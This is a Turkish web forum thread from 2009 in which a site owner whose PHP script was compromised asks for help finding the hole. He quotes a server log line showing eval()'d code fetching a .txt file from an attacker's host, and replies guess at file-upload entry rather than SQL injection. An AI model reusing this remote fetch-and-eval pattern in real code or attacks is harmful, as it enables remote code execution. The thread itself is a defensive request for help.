• 04-12-2009, 01:54:56
    #1
    Üyeliği durduruldu
    Konuyu Yanlış Yere Açtıysam Özür.
    php scriptimde sql injection acıgı var ve ben bu acıgı bulamadım scriptimin sql kendi sql bilgileri ile eklenti yaparak hacklediler

    Sunucunun Loglarına Baktım Ve Sunu Buldum...

    *[Wed Dec 02 23:35:50 2009] [error] [client 78.163.48.53] PHP Warning: file_get_contents(http://www.hackyapankisininsitesi.com/xcokert.txt) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found\r\n in /var/www/vhosts/benimsitem.net/httpdocs/klasorismi/inc/fonksiyonlar.php(686) : eval()'d code(1) : eval()'d code on line 1
    Bu Şekilde Bir Şey Buldum Bu Konuda Bilgisi Olan Beni Aydınlatırsa Sevinirim Acil Kapatmam lazım bu acıgı..
  • 04-12-2009, 02:05:37
    #2
    Üyeliği durduruldu
    kodlarını yayınla bakalım
  • 04-12-2009, 11:31:09
    #3
    sunucuya giren kişi sql injection'dan girmemiştir büyük ihtimal. Sunucu'na dosya yükletmiş ya da sunucu ya bir şekilde girmiş. file_get_contents ile .txt dosyasını neden çağırmaya çalışmış anlamadım.
  • 04-12-2009, 16:45:07
    #4
    Üyeliği durduruldu
    bir çok yöntemle saldiriyor olabilirler. php güvenliği ile ilgili hazirladigim video eğitim seti var. konu ile ilgili pm attim